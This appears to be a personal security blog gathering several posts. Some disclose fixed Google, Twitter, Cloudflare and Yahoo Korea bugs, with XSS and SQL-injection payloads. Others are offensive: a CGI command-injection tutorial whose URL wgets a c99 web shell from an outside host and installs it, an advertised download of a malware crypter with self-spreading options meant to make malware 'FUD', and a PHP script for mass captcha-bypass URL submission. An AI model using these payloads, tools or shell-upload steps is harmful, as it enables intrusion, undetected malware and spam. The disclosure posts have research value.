I forgot to blog about my another Google bug. Now a days i am got busy in my start up project ! I hope so i will back soon on bug bounty will have some god blog out !
To Change OAuth Target URL & Domain Description Can be achieved using Clickjacking Vulnerability . Click Jacking is commonly know as OWASP Top 10 Vulnerability.
Status: Fixed
OAuth is cool and simple to understand developer can integrate with Google ‘s OAuth endpoints seamlessly and effortlessly . Google Provider a Panel to manage the Return URL & Domain Description by using following URL.
Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com
On the page there two input box called as Target URL path prefix: & Domain description: where use submit Domain & description information.
As Shown in the following Image :
Change OAuth Domain & Description
POC : < i f r a m e s r c = “https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com” width=”600″ height=”600″> // Not actual POC
Header Information :
As you can see missing Header information in the below Header Information
Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Special thanks to Google Security Team & G4H(garage4hackers.com) Team ..
Thank you twitter and specially BOB from twitter who was always in touch for solving twitter vulnerability which was reported by me.
Thank you twitter to start this kind of program to encourage Information Security Researcher ./.
Here Link :
https://twitter.com/about/security
PIC :
————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep kamble
0x4 Reported: December 28 ,2011
0x5 Vulnerability Fix date : Jan 05 ,2012
0x6 Public Release: Jan 05 ,2012
0x7 Browser : FireFox , IE
0x8 OS : Win7 , Ubantu
——————————————————————–
Description of script:
Twitter providing features to protect the user privacy, using account setting you can protect your Tweets, you can change Username, you can change your password, and you can change your E-mail address.
Affected script URL:
URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name
Vulnerability Description:
1) Cross Site Scripting Vulnerability ( Twitter mobile is infected User Side XSS as well as it was protected to click jacking ):
Cross-Site Scripting attack is type of injection, in which malicious java scripts are injected into the web sites dynamic page.
2) HTML Injection Vulnerability (Twitter mobile is infected User Side , one html injection was stored )
HTML Injection is a type of injection, in which malicious HTML Code injected into the web sites Pages.
Exploit Description + Proof of Concept:
URL #1: https://mobile.twitter.com/settings/name
Title #1: Stored HTML Injection Vulnerability
In the above URL there is one input box to change the name. The HTML code of the input box is following.
As the twitter allow only 20 Characters in the name filed.
If we try executing the malicious HTML Code then HTML code look like as follows
HTML Code : “>sandeep
Malicious HTML code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.
URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability
In the above URL there is one input box to change the user name. The html code of the input box is following.
In the input box we can execute the JAVA script as well as html Code so that is vulnerable to Cross site scripting and HTML Code injection Vulnerability
JS : ” > < s cr i pt> a lert (document.domain)< / scrip t >
Malicious JS code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.
Similarly we can execute HTML Code but it is not stored HTML Code Execution.
Check Out Video Here
http://dl.dropbox.com/u/18007092/twitter.swf
Countermeasure
1) Determine whether HTML output includes input parameters
2) In short perform input sensitization
Warm Regards,
Sandeep Kamble
www.sandeepkamble.com
0×1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0×4 Reported : October 12, 2011
0×6 Public Release : October 17 2011
0x7 Status: Fixed
Description :
Anti-virus.cloudflare.com is a service for avoiding spams .
This project to stop attacks and educate visitors with infected computers about how they can clean up their machines.
Affected Variable :
?b_src=
Exploit :
Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS)
Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies .
POC :
Screen Shot :
Cloud XSS
1) Determine whether HTML output includes input parameters
2) In short perform input sensitization
Conclusion
I like to thank the cloudflare Security Team for their quick responses to my reports.
Author: Sandeep Kamble
Released Date: September 9, 2010
Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept
information passed from the client as a replacement for the specified target.
Vulnerabilities:-
1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.
Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995
Exploit:-
The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag “Input”. Each “Input” tag has a variable name associated with it. This is the variable name that forms the left hand side of the previously mentioned variable=value token. The contents of the variable forms the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the “INput” field. However if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the “Input”
data will pass the data directly to the interpreter. **
Example:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|
Shell upload command:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|
Shell:-
http://www.victem.com/newswire/uploadedimage.php
Conclusion:-
The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.
After shell upload you can try for more.I hope you find it useful , be safe !
This Is Crypter with Universal Stub Generator 1.3 & USG is written in VB.net.
Its got Spread options, P2P, USB, & Startup
File Clone, Icon and File Info and then the other PE options u see listed, like add section, strip relocations, change entrypoint etc.
Make Your Stuff FUD
http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar
This Captcha bypass allow to spammer to submit number (that May be more than 1000 Website) of websites to Google crawl by writing simple program in any programming language. Original link (With captcha): www.google.com/addurl/?continue=/addurl Bypass captcha link POC: http://www.google.com/addurl?q=www.mysite.com&hl=&dqq= If you execute the above URL in the browser then it will add the new website to Google crawl database. Following Program can be used to submit a large amount of website at a time. PHP Code <?php @if(isset($_POST)){ $part1 = "http://www.google.com/addurl?q="; $part2 = "&hl=&dqq="; $curl = curl_init("http://google.com"); curl_exec($curl); $urls=$_POST["urls"]; $lines=explode("\n",$urls); foreach($lines as $line) { $new = str_replace(" ", "", $part1.$line.$part2); curl_setopt($curl,CURLOPT_URL,$new); }} echo "done."; ?> <html> <head> <title>Google Add Urls</title> </head> <body> <form> <textarea name="urls" cols="20" rows="100"></textarea><br /> <input type="submit" value="add urls" /> </form> </body> </html> This may be small Vulnerability but still we want google to most secure! So please try to fix. Otherwise there will be no use of captcha . Now Google Patched This vuln :) /peace Sandeep k.
Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed
Overview:
Yahoo Korea having Blog-shop which is one of the most famous sub domain in Korea .
A cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.
Exploit Description :
It has Sql injection in the notice_read.html?key script . I was Successful for retrieving the yahoo users cookies from this SQL Injection by inserting JAVA-Script into the SQL Injection payload.
POC (Proof Of Concept ):
http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16’/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert(‘XSS HERE’);</script>,7,8,9,0,1,2,3,4,5,6,7–%20
Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)
Regard
Sandeep Kamble
This is my personal blog , i am going to share my personal things which is related to IT security . I am going to share my all expreinces which is realted to Information technology .
Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, shaista mam & my team and my friends Kishor , Lalit , Jitu ,Mug .
My Gmail : sandeepk.l337@gmail.com